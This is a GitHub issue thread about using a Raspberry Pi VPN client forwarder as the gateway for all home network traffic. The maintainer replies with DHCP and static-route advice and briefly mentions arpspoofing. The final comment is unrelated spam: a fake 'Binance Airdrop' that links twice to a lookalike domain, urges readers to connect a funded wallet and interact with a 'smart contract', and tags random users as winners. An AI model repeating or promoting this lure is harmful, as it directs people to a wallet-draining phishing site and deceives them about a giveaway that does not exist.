### ISSUE TITLE
Using this solution for all traffic

### ISSUE THREAD

**Issue by remy** [adamprescott/rpi-vpnclientforwarder#1]
Hi there,

I appreciate your repo is a little old (3 years?), certainly old enough that `sudo service airvpn start` doesn't work (this was the only bit though, and `/etc/init.d/airvpn start` did work).

I've been considering whether I can use a Pi3 with this setup as the last hop out of my home wifi to run everything through a VPN. (for context, I can run openvpn on my router, but sheer work of doing all the encryption for the vpn loses me about 4/5ths of my bandwidth).

What I was wondering (and this might be well beyond the remit of your repo), is whether I can route **all** traffic from my router into the Pi, and use this setup to forward all the traffic through the vpn? And, if you might be able to elaborate on how?

Though, I suspect having a single ethernet port on the Pi might cause the biggest problems...but I guess I can try to solve one problem at a time!

None the less, thanks for post this guide.

**Comment by adamprescott** [comment]
There's a few ways you could do this. The quickest way would be to modify the DHCP settings on your router so the Pi is set as the gateway, or you could disable DHCP on the router if it doesn't support changing the gateway and setup a DHCP server on the PI. You would also need to setup a static route on the Pi so the IP address of the VPN Server uses your router as the gateway.

You could also use arpspoofing as another means.

**Comment by katsavav** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @vinaysshenoy, @rohithreddy, @selftaught, @TgeaUs, @jimpei8989, @HAOYUatHZ, @gavinsun2021
